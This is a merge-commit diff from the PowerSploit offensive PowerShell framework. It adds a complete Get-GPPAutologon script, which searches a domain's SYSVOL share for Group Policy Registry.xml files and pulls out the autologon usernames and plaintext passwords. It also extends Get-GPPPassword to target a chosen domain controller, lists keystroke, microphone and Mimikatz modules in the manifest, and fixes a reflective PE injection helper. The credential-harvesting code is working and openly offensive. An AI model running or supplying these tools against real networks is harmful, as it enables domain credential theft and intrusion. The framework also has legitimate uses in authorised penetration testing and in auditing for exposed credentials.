Merge pull request PowerShellMafia#202 from PowerShellMafia/dev

Dev

Author: HarmJ0y

CodeExecution/Invoke-ReflectivePEInjection.ps1

@@ -648,7 +648,7 @@ $RemoteScriptBlock = {
 		$Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle
 
 		$FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
-		$FreeLibraryDelegate = Get-DelegateType @([Bool]) ([IntPtr])
+		$FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
 		$FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
 		$Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary
 

Exfiltration/Exfiltration.psd1

@@ -31,6 +31,7 @@ FunctionsToExport = '*'
 FileList = 'Exfiltration.psm1', 'Exfiltration.psd1', 'Get-TimedScreenshot.ps1', 'Out-Minidump.ps1',
            'Get-Keystrokes.ps1', 'Get-GPPPassword.ps1', 'Usage.md', 'Invoke-Mimikatz.ps1',
            'Invoke-NinjaCopy.ps1', 'Invoke-TokenManipulation.ps1', 'Invoke-CredentialInjection.ps1',
-           'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml'
+           'VolumeShadowCopyTools.ps1', 'Get-VaultCredential.ps1', 'Get-VaultCredential.ps1xml',
+           'Get-MicrophoneAudio.ps1', 'Get-GPPAutologon.ps1'
 
 }

Exfiltration/Get-GPPAutologon.ps1

@@ -0,0 +1,139 @@
+function Get-GPPAutologon 
+{
+<#
+.SYNOPSIS
+
+    Retrieves password from Autologon entries that are pushed through Group Policy Registry Preferences.
+
+    PowerSploit Function: Get-GPPAutologon
+    Author: Oddvar Moe (@oddvarmoe)
+    Based on Get-GPPPassword by Chris Campbell (@obscuresec) - Thanks for your awesome work!
+    License: BSD 3-Clause
+    Required Dependencies: None
+    Optional Dependencies: None
+ 
+.DESCRIPTION
+
+    Get-GPPAutologn searches the domain controller for registry.xml to find autologon information and returns the username and password.
+
+.EXAMPLE
+
+    PS C:\> Get-GPPAutolgon
+    
+    UserNames                                    File                                         Passwords                                  
+    ---------                                    ----                                         ---------                                  
+    {administrator}                              \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {PasswordsAreLam3}                    
+    {NormalUser}                                 \\ADATUM.COM\SYSVOL\Adatum.com\Policies\{... {ThisIsAsupaPassword}                    
+
+
+.EXAMPLE
+
+    PS C:\> Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
+    
+    password
+    password12
+    password123
+    password1234
+    password1234$
+    read123
+    Recycling*3ftw!
+
+.LINK
+    
+    https://support.microsoft.com/nb-no/kb/324737
+#>
+    
+    [CmdletBinding()]
+    Param ()
+    
+    #Some XML issues between versions
+    Set-StrictMode -Version 2
+    
+    #define helper function to parse fields from xml files
+    function Get-GPPInnerFields 
+    {
+    [CmdletBinding()]
+        Param (
+            $File 
+        )
+    
+        try 
+        {
+            $Filename = Split-Path $File -Leaf
+            [xml] $Xml = Get-Content ($File)
+
+            #declare empty arrays
+            $Password = @()
+            $UserName = @()
+            
+            #check for password and username field
+            if (($Xml.innerxml -like "*DefaultPassword*") -and ($Xml.innerxml -like "*DefaultUserName*"))
+            {
+                $props = $xml.GetElementsByTagName("Properties")
+                foreach($prop in $props)
+                {
+                    switch ($prop.name) 
+                    {
+                        'DefaultPassword'
+                        {
+                            $Password += , $prop | Select-Object -ExpandProperty Value
+                        }
+                    
+                        'DefaultUsername'
+                        {
+                            $Username += , $prop | Select-Object -ExpandProperty Value
+                        }
+                }
+
+                    Write-Verbose "Potential password in $File"
+                }
+                         
+                #put [BLANK] in variables
+                if (!($Password)) 
+                {
+                    $Password = '[BLANK]'
+                }
+
+                if (!($UserName))
+                {
+                    $UserName = '[BLANK]'
+                }
+                       
+                #Create custom object to output results
+                $ObjectProperties = @{'Passwords' = $Password;
+                                      'UserNames' = $UserName;
+                                      'File' = $File}
+                    
+                $ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
+                Write-Verbose "The password is between {} and may be more than one value."
+                if ($ResultsObject)
+                {
+                    Return $ResultsObject
+                } 
+            }
+        }
+        catch {Write-Error $Error[0]}
+    }
+
+    try {
+        #ensure that machine is domain joined and script is running as a domain account
+        if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
+            throw 'Machine is not a domain member or User is not a member of the domain.'
+        }
+    
+        #discover potential registry.xml containing autologon passwords
+        Write-Verbose 'Searching the DC. This could take a while.'
+        $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Registry.xml'
+    
+        if ( -not $XMlFiles ) {throw 'No preference files found.'}
+
+        Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
+    
+        foreach ($File in $XMLFiles) {
+                $Result = (Get-GppInnerFields $File.Fullname)
+                Write-Output $Result
+        }
+    }
+
+    catch {Write-Error $Error[0]}
+}

Exfiltration/Get-GPPPassword.ps1

@@ -12,7 +12,12 @@ function Get-GPPPassword {
  
 .DESCRIPTION
 
-    Get-GPPPassword searches the domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
+    Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
+
+.PARAMETER Server
+    
+    Specify the domain controller to search for. 
+    Default's to the users current domain
 
 .EXAMPLE
 
@@ -42,6 +47,21 @@ function Get-GPPPassword {
     UserNames : {DEMO\Administrator, admin}
     File      : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
 
+.EXAMPLE
+    PS C:\> Get-GPPPassword -Server EXAMPLE.COM
+
+    NewName   : [BLANK]
+    Changed   : {2014-02-21 05:28:53}
+    Passwords : {password12}
+    UserNames : {test1}
+    File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
+
+    NewName   : {mspresenters}
+    Changed   : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
+    Passwords : {Recycling*3ftw!, password123, password1234}
+    UserNames : {Administrator (built-in), DummyAccount, dummy2}
+    File      : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
+
 .EXAMPLE
 
     PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
@@ -63,7 +83,11 @@ function Get-GPPPassword {
 #>
 
     [CmdletBinding()]
-    Param ()
+    Param (
+            [ValidateNotNullOrEmpty()]
+            [String]
+            $Server = $Env:USERDNSDOMAIN
+    )
 
     #Some XML issues between versions
     Set-StrictMode -Version 2
@@ -109,7 +133,7 @@ function Get-GPPPassword {
     function Get-GPPInnerFields {
     [CmdletBinding()]
         Param (
-            $File 
+            $File
         )
 
         try {
@@ -204,10 +228,10 @@ function Get-GPPPassword {
         if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
             throw 'Machine is not a domain member or User is not a member of the domain.'
         }
-    
+
         #discover potential files containing passwords ; not complaining in case of denied access to a directory
-        Write-Verbose 'Searching the DC. This could take a while.'
-        $XMlFiles = Get-ChildItem -Path "\\$Env:USERDNSDOMAIN\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
+        Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
+        $XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'
 
         if ( -not $XMlFiles ) {throw 'No preference files found.'}